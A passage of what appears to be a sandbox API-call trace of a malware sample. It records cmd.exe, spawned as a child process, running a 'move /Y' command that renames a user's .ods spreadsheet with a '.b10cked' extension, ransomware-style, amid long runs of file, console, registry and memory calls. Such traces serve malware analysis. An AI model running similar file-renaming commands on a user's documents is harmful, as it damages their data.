(hFile=0x4c) returned 0x1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] GetFileType (hFile=0x4c) returned 0x1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] GetFileType (hFile=0x4c) returned 0x1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] GetFileType (hFile=0x4c) returned 0x1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.019] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.019] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.019] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.019] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] GetFileType (hFile=0x4c) returned 0x1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] GetFileType (hFile=0x4c) returned 0x1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] GetFileType 
(hFile=0x4c) returned 0x1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] GetFileType (hFile=0x4c) returned 0x1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] GetFileType (hFile=0x4c) returned 0x1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] GetFileType (hFile=0x4c) returned 0x1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] GetFileType (hFile=0x4c) returned 0x1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] GetFileType (hFile=0x4c) returned 0x1 [0141.020] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.020] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.020] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.021] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.021] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x32, lpOverlapped=0x0) returned 1 [0141.021] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.021] GetFileType (hFile=0x4c) returned 0x1 [0141.021] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.021] GetFileType (hFile=0x4c) returned 0x1 [0141.021] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.021] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x32, lpOverlapped=0x0) returned 1 [0141.021] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.021] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.021] _close (_FileHandle=4) returned 0 [0141.021] FindNextFileW (in: hFindFile=0x2d0e90, lpFindFileData=0x1ef5e4 | out: lpFindFileData=0x1ef5e4) returned 0 [0141.022] GetLastError () returned 0x12 [0141.022] FindClose (in: hFindFile=0x2d0e90 | out: hFindFile=0x2d0e90) returned 1 [0141.022] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0141.022] _close (_FileHandle=3) returned 0 [0141.023] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.023] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.023] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0141.023] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.023] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.023] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.023] SetConsoleInputExeNameW () returned 0x1 [0141.023] GetConsoleOutputCP () returned 0x1b5 [0141.023] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.023] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.024] exit (_Code=0) Process: id = "158" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xe0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14616 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14617 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14618 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14619 start_va = 0x1f0000 end_va = 
0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 14620 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14621 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14622 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14623 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14624 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 14625 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15570 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15571 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15572 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15573 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15574 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 
region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 15575 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15576 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15577 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15578 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15579 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15580 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15581 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15582 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15583 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15584 start_va = 0x390000 end_va = 0x457fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 15585 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15586 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15587 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15588 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15589 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15590 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 15591 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 15592 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 15593 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Thread: id = 215 os_tid = 0xe1c [0140.230] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efcdc | out: lpSystemTimeAsFileTime=0x2efcdc*(dwLowDateTime=0x8d845e20, dwHighDateTime=0x1d440a9)) [0140.230] GetCurrentProcessId () returned 0xe0c [0140.230] 
GetCurrentThreadId () returned 0xe1c [0140.230] GetTickCount () returned 0x2c0af [0140.230] QueryPerformanceCounter (in: lpPerformanceCount=0x2efcd4 | out: lpPerformanceCount=0x2efcd4*=19701965372) returned 1 [0140.231] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.231] __set_app_type (_Type=0x1) [0140.231] __p__fmode () returned 0x76b331f4 [0140.231] __p__commode () returned 0x76b331fc [0140.231] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.231] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.232] GetCurrentThreadId () returned 0xe1c [0140.232] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe1c) returned 0x38 [0140.232] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.232] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.232] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.232] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.232] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efc6c | out: phkResult=0x2efc6c*=0x0) returned 0x2 [0140.232] VirtualQuery (in: lpAddress=0x2efca3, lpBuffer=0x2efc3c, dwLength=0x1c | out: lpBuffer=0x2efc3c*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.232] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efc3c, dwLength=0x1c | out: lpBuffer=0x2efc3c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.232] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efc3c, dwLength=0x1c | 
out: lpBuffer=0x2efc3c*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.233] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efc3c, dwLength=0x1c | out: lpBuffer=0x2efc3c*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.233] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efc3c, dwLength=0x1c | out: lpBuffer=0x2efc3c*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.233] GetConsoleOutputCP () returned 0x1b5 [0140.233] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.233] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.233] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.233] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.233] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.233] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.233] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.234] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.234] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.234] GetEnvironmentStringsW () returned 0x100198* [0140.234] FreeEnvironmentStringsW (penv=0x100198) returned 1 [0140.234] GetEnvironmentStringsW () returned 0x100198* [0140.234] FreeEnvironmentStringsW (penv=0x100198) returned 1 [0140.234] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eebdc | 
out: phkResult=0x2eebdc*=0x40) returned 0x0 [0140.234] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x0, lpData=0x2eebe8*=0xc0, lpcbData=0x2eebe0*=0x1000) returned 0x2 [0140.234] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x1, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.234] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x0, lpData=0x2eebe8*=0x1, lpcbData=0x2eebe0*=0x1000) returned 0x2 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x0, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x40, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x40, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x0, lpData=0x2eebe8*=0x40, lpcbData=0x2eebe0*=0x1000) returned 0x2 [0140.235] RegCloseKey (hKey=0x40) returned 0x0 [0140.235] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eebdc | out: phkResult=0x2eebdc*=0x40) returned 0x0 [0140.235] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x0, lpData=0x2eebe8*=0x40, lpcbData=0x2eebe0*=0x1000) returned 0x2 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x1, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x0, lpData=0x2eebe8*=0x1, lpcbData=0x2eebe0*=0x1000) returned 0x2 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x0, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x9, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x4, lpData=0x2eebe8*=0x9, lpcbData=0x2eebe0*=0x4) returned 0x0 [0140.235] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eebe4, lpData=0x2eebe8, lpcbData=0x2eebe0*=0x1000 | out: lpType=0x2eebe4*=0x0, lpData=0x2eebe8*=0x9, lpcbData=0x2eebe0*=0x1000) returned 0x2 [0140.235] RegCloseKey (hKey=0x40) returned 0x0 [0140.235] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.235] srand (_Seed=0x5b88636e) [0140.235] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS\" 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked\"" [0140.235] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked\"" [0140.235] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.236] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1018f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.236] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.236] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.236] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.236] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.236] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.236] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.236] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.236] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.236] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.236] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.236] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.236] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.236] GetEnvironmentStringsW () returned 0x1022e8* [0140.237] FreeEnvironmentStringsW (penv=0x1022e8) returned 1 [0140.237] GetEnvironmentVariableW (in: lpName="COMSPEC", 
lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.237] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.237] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.237] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.237] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.237] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.237] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.237] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.237] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.237] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.237] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef9a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.237] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef9a8, lpFilePart=0x2ef9a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef9a4*="Desktop") returned 0x18 [0140.237] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 